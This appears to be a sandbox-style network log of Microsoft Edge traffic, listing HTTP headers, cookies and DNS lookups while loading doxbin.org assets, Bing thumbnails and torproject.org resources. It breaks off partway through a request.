content-security-policy: upgrade-insecure-requests;
date: Fri, 29 Nov 2024 05:21:33 GMT
content-type: image/png
content-length: 201922
last-modified: Wed, 01 Nov 2023 20:40:15 GMT
etag: "6542b7af-314c2"
x-frame-options: DENY
x-powered-by: PleskLin
accept-ranges: bytes
age: 449233
ddg-cache-status: HIT
GET

https://check.ddos-guard.net/check.js

msedge.exe

Remote address:

185.129.100.100:443

Request

GET /check.js HTTP/2.0
host: check.ddos-guard.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: ddos-guard
date: Wed, 04 Dec 2024 10:08:40 GMT
content-type: application/javascript
expires: Thu, 04 Dec 2025 10:08:40 GMT
last-modified: Thu, 01 Jan 1970 00:00:00 GMT
cache-control: private, s-maxage=0, max-age=31536000
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
etag: i01KOlwbXtN3c1Hx
set-cookie: __ddg2=i01KOlwbXtN3c1Hx; Domain=check.ddos-guard.net; Path=/; HttpOnly; SameSite=None; Secure; Expires=Thu, 04-Dec-2025 10:08:40 GMT
content-length: 152
GET

https://check.ddos-guard.net/set/id/i01KOlwbXtN3c1Hx

msedge.exe

Remote address:

185.129.100.100:443

Request

GET /set/id/i01KOlwbXtN3c1Hx HTTP/2.0
host: check.ddos-guard.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg2=i01KOlwbXtN3c1Hx

Response

HTTP/2.0 200

server: ddos-guard
date: Wed, 04 Dec 2024 10:08:41 GMT
content-type: image/png
expires: Thu, 01 Jan 1970 00:00:00 GMT
cache-control: no-cache
pragma: no-cache
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
set-cookie: __ddg2=i01KOlwbXtN3c1Hx; Domain=check.ddos-guard.net; Path=/; HttpOnly; SameSite=None; Secure; Expires=Thu, 04-Dec-2025 10:08:41 GMT
content-length: 68
DNS

4.42.215.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.42.215.91.in-addr.arpa

IN PTR

Response
DNS

fonts.googleapis.com

Remote address:

8.8.8.8:53

Request

fonts.googleapis.com

IN A

Response

fonts.googleapis.com

IN A

216.58.212.234
DNS

cdn.doxbin.net

Remote address:

8.8.8.8:53

Request

cdn.doxbin.net

IN A

Response

cdn.doxbin.net

IN A

95.129.232.35
DNS

234.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.212.58.216.in-addr.arpa

IN PTR

Response

234.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f101e100net

234.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f234�I

234.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f10�I
DNS

www.bing.com

Remote address:

8.8.8.8:53

Request

www.bing.com

IN A

Response

www.bing.com

IN CNAME

www-www.bing.com.trafficmanager.net

www-www.bing.com.trafficmanager.net

IN CNAME

www.bing.com.edgekey.net

www.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

88.221.135.11

e86303.dscx.akamaiedge.net

IN A

88.221.135.0

e86303.dscx.akamaiedge.net

IN A

88.221.135.1

e86303.dscx.akamaiedge.net

IN A

88.221.135.9

e86303.dscx.akamaiedge.net

IN A

88.221.135.3

e86303.dscx.akamaiedge.net

IN A

88.221.134.251

e86303.dscx.akamaiedge.net

IN A

88.221.135.2

e86303.dscx.akamaiedge.net

IN A

88.221.135.10

e86303.dscx.akamaiedge.net

IN A

88.221.135.16
DNS

www.bing.com

Remote address:

8.8.8.8:53

Request

www.bing.com

IN A

Response

www.bing.com

IN CNAME

www-www.bing.com.trafficmanager.net

www-www.bing.com.trafficmanager.net

IN CNAME

www.bing.com.edgekey.net

www.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

88.221.135.0

e86303.dscx.akamaiedge.net

IN A

88.221.135.1

e86303.dscx.akamaiedge.net

IN A

88.221.135.11

e86303.dscx.akamaiedge.net

IN A

88.221.134.251

e86303.dscx.akamaiedge.net

IN A

88.221.135.2

e86303.dscx.akamaiedge.net

IN A

88.221.135.16

e86303.dscx.akamaiedge.net

IN A

88.221.135.10

e86303.dscx.akamaiedge.net

IN A

88.221.135.3

e86303.dscx.akamaiedge.net

IN A

88.221.135.9
GET

https://netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css

msedge.exe

Remote address:

104.18.11.207:443

Request

GET /font-awesome/4.0.3/css/font-awesome.css HTTP/2.0
host: netdna.bootstrapcdn.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Wed, 04 Dec 2024 10:08:45 GMT
content-type: text/css; charset=utf-8
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: FR
vary: Accept-Encoding
access-control-allow-origin: *
cache-control: public, max-age=31919000
content-encoding: br
etag: "1f9e9d1a5a1d347d945ef4b7727f2ea0"
last-modified: Mon, 25 Jan 2021 22:04:53 GMT
cdn-cachedat: 10/25/2024 05:16:16
cdn-proxyver: 1.05
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
cdn-edgestorageid: 951
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-status: 200
cdn-requesttime: 0
cdn-requestid: 5fe0d6710a8b0c20009dfddea9c1a7a8
cdn-cache: HIT
cf-cache-status: HIT
age: 454176
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 8ecaff3e7d9771e0-LHR
alt-svc: h3=":443"; ma=86400
GET

https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js

msedge.exe

Remote address:

104.18.11.207:443

Request

GET /bootstrap/3.3.7/js/bootstrap.min.js HTTP/2.0
host: maxcdn.bootstrapcdn.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Wed, 04 Dec 2024 10:08:46 GMT
content-type: application/javascript; charset=utf-8
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
vary: Accept-Encoding
access-control-allow-origin: *
cache-control: public, max-age=31919000
content-encoding: br
etag: W/"5869c96cc8f19086aee625d670d741f9"
last-modified: Mon, 25 Jan 2021 22:04:00 GMT
cdn-cachedat: 03/18/2024 12:13:26
cdn-proxyver: 1.04
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
cdn-edgestorageid: 1047
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-status: 200
cdn-requesttime: 0
cdn-requestid: 14e5a11349f53569efdd81c9979d1aea
cdn-cache: HIT
cf-cache-status: HIT
age: 1756192
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 8ecaff3fae9671e0-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.doxbin.net/gold.gif

msedge.exe

Remote address:

95.129.232.35:443

Request

GET /gold.gif HTTP/2.0
host: cdn.doxbin.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=s0rpg7O9Si8604IO; Domain=.doxbin.net; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.net; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg10_=1733306926; Domain=.doxbin.net; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
content-security-policy: upgrade-insecure-requests;
set-cookie: __ddg1_=EKbmhxjOTp1C2IsgxSjV; Domain=.doxbin.net; HttpOnly; Path=/; Expires=Thu, 04-Dec-2025 10:08:46 GMT
date: Mon, 25 Nov 2024 04:57:00 GMT
content-type: image/gif
content-length: 24015
last-modified: Thu, 20 Jun 2024 01:38:10 GMT
etag: "66738802-5dcf"
x-powered-by: PleskLin
accept-ranges: bytes
age: 796306
ddg-cache-status: HIT
GET

https://cdn.doxbin.net/red.gif

msedge.exe

Remote address:

95.129.232.35:443

Request

GET /red.gif HTTP/2.0
host: cdn.doxbin.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=hd9q7syPLwFkyxdp; Domain=.doxbin.net; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.net; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg10_=1733306926; Domain=.doxbin.net; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
content-security-policy: upgrade-insecure-requests;
set-cookie: __ddg1_=Za5J5oVYRXBNEcEfP7qX; Domain=.doxbin.net; HttpOnly; Path=/; Expires=Thu, 04-Dec-2025 10:08:46 GMT
date: Mon, 02 Dec 2024 18:01:50 GMT
content-type: image/gif
content-length: 24015
last-modified: Mon, 24 Jun 2024 20:42:21 GMT
etag: "6679da2d-5dcf"
x-powered-by: PleskLin
accept-ranges: bytes
age: 144416
ddg-cache-status: HIT
GET

https://cdn.doxbin.net/purple.gif

msedge.exe

Remote address:

95.129.232.35:443

Request

GET /purple.gif HTTP/2.0
host: cdn.doxbin.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=D85rx0RVkB9Ir8iQ; Domain=.doxbin.net; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.net; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg10_=1733306926; Domain=.doxbin.net; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
content-security-policy: upgrade-insecure-requests;
set-cookie: __ddg1_=ADE77JLZv9iXX1NQ7mLU; Domain=.doxbin.net; HttpOnly; Path=/; Expires=Thu, 04-Dec-2025 10:08:46 GMT
date: Mon, 25 Nov 2024 05:48:49 GMT
content-type: image/gif
content-length: 20417
last-modified: Wed, 01 Nov 2023 20:41:21 GMT
etag: "6542b7f1-4fc1"
x-powered-by: PleskLin
accept-ranges: bytes
age: 793198
ddg-cache-status: HIT
GET

https://tse1.mm.bing.net/th?&id=OVP.4FvAebnC2mNBb6K6_SBIbQHgFo&w=197&h=110&c=7&pid=1.7&rs=1

msedge.exe

Remote address:

150.171.28.10:443

Request

GET /th?&id=OVP.4FvAebnC2mNBb6K6_SBIbQHgFo&w=197&h=110&c=7&pid=1.7&rs=1 HTTP/2.0
host: tse1.mm.bing.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=1209600
content-length: 3712
content-type: image/jpeg
x-cache: TCP_MISS
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C58C3C94ADF94FEF8E549B7A0E48BB45 Ref B: LON601060107060 Ref C: 2024-12-04T10:09:04Z
date: Wed, 04 Dec 2024 10:09:04 GMT
GET

https://tse1.mm.bing.net/th?&id=OVP.dA449c-N9Zzje0ZEZgq5RAHgFo&w=197&h=110&c=7&pid=1.7&rs=1

msedge.exe

Remote address:

150.171.28.10:443

Request

GET /th?&id=OVP.dA449c-N9Zzje0ZEZgq5RAHgFo&w=197&h=110&c=7&pid=1.7&rs=1 HTTP/2.0
host: tse1.mm.bing.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=1209600
content-length: 6091
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CCF70C9A202C49E594FB4E786A9F0BFA Ref B: LON601060107060 Ref C: 2024-12-04T10:09:04Z
date: Wed, 04 Dec 2024 10:09:04 GMT
GET

https://tse1.mm.bing.net/th?&id=OVP.I4s5HEEfmwG1zIb3b1xa4AHgFo&w=197&h=110&c=7&pid=1.7&rs=1

msedge.exe

Remote address:

150.171.28.10:443

Request

GET /th?&id=OVP.I4s5HEEfmwG1zIb3b1xa4AHgFo&w=197&h=110&c=7&pid=1.7&rs=1 HTTP/2.0
host: tse1.mm.bing.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=1209600
content-length: 5830
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DA0B3D5BEF054ED4AC01DFC71758400E Ref B: LON601060107060 Ref C: 2024-12-04T10:09:05Z
date: Wed, 04 Dec 2024 10:09:05 GMT
GET

https://tse1.mm.bing.net/th?&id=OVP.R1kmKekxnEGNtcvRzl1u8AHgFo&w=197&h=110&c=7&pid=1.7&rs=1

msedge.exe

Remote address:

150.171.28.10:443

Request

GET /th?&id=OVP.R1kmKekxnEGNtcvRzl1u8AHgFo&w=197&h=110&c=7&pid=1.7&rs=1 HTTP/2.0
host: tse1.mm.bing.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=1209600
content-length: 5744
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 47DA635B104E4D56860A05008DFFE7D6 Ref B: LON601060107060 Ref C: 2024-12-04T10:09:07Z
date: Wed, 04 Dec 2024 10:09:07 GMT
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp

msedge.exe

Remote address:

23.73.137.233:443

Request

OPTIONS /api/report?cat=bingth&ndcParam=QWthbWFp HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://www.bing.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 504 Gateway Time-out

Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 280
Expires: Wed, 04 Dec 2024 10:10:18 GMT
Date: Wed, 04 Dec 2024 10:10:18 GMT
Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.cd8a4917.1733306956.1daca202
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE

msedge.exe

Remote address:

23.73.137.233:443

Request

OPTIONS /api/report?cat=bingth&ndcParam=QUZE HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://th.bing.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 503 Service Unavailable

Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 280
Expires: Wed, 04 Dec 2024 10:11:20 GMT
Date: Wed, 04 Dec 2024 10:11:20 GMT
Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.e5894917.1733306956.1e0769e6
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
DNS

r.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.bing.com

IN A

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

95.101.143.219

e86303.dscx.akamaiedge.net

IN A

88.221.135.0

e86303.dscx.akamaiedge.net

IN A

88.221.135.2

e86303.dscx.akamaiedge.net

IN A

88.221.134.249

e86303.dscx.akamaiedge.net

IN A

88.221.134.2

e86303.dscx.akamaiedge.net

IN A

88.221.134.251

e86303.dscx.akamaiedge.net

IN A

95.101.143.212

e86303.dscx.akamaiedge.net

IN A

88.221.135.1

e86303.dscx.akamaiedge.net

IN A

95.101.143.218
DNS

233.137.73.23.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

233.137.73.23.in-addr.arpa

IN PTR

Response

233.137.73.23.in-addr.arpa

IN PTR

a23-73-137-233deploystaticakamaitechnologiescom
DNS

218.143.101.95.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

218.143.101.95.in-addr.arpa

IN PTR

Response

218.143.101.95.in-addr.arpa

IN PTR

a95-101-143-218deploystaticakamaitechnologiescom
DNS

www.torproject.org

msedge.exe

Remote address:

8.8.8.8:53

Request

www.torproject.org

IN A

Response

www.torproject.org

IN A

204.8.99.144

www.torproject.org

IN A

116.202.120.165

www.torproject.org

IN A

95.216.163.36

www.torproject.org

IN A

204.8.99.146

www.torproject.org

IN A

116.202.120.166
DNS

144.99.8.204.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

144.99.8.204.in-addr.arpa

IN PTR

Response

144.99.8.204.in-addr.arpa

IN PTR

web-dal-07 torprojectorg
DNS

144.99.8.204.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

144.99.8.204.in-addr.arpa

IN PTR

Response

144.99.8.204.in-addr.arpa

IN PTR

web-dal-07 torprojectorg
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

95.101.143.218

e86303.dscx.akamaiedge.net

IN A

88.221.134.251

e86303.dscx.akamaiedge.net

IN A

95.101.143.219

e86303.dscx.akamaiedge.net

IN A

88.221.134.2

e86303.dscx.akamaiedge.net

IN A

88.221.135.2

e86303.dscx.akamaiedge.net

IN A

88.221.135.3

e86303.dscx.akamaiedge.net

IN A

88.221.135.1

e86303.dscx.akamaiedge.net

IN A

88.221.134.249

e86303.dscx.akamaiedge.net

IN A

88.221.135.0
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

95.101.143.218

e86303.dscx.akamaiedge.net

IN A

88.221.134.251

e86303.dscx.akamaiedge.net

IN A

88.221.135.2

e86303.dscx.akamaiedge.net

IN A

88.221.135.0

e86303.dscx.akamaiedge.net

IN A

95.101.143.219

e86303.dscx.akamaiedge.net

IN A

88.221.134.249

e86303.dscx.akamaiedge.net

IN A

88.221.135.1

e86303.dscx.akamaiedge.net

IN A

88.221.135.3

e86303.dscx.akamaiedge.net

IN A

88.221.134.2
GET

https://www.torproject.org/static/fonts/fontawesome/css/all.min.css?h=9d272f6a

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/css/all.min.css?h=9d272f6a HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:22 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/css/all.min.css
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:51 GMT
ETag: "d1ed-5d78863a783c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:22 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11760
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css
Content-Language: en
GET

https://www.torproject.org/static/js/jquery-3.2.1.min.js?h=1055018c

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/js/jquery-3.2.1.min.js?h=1055018c HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
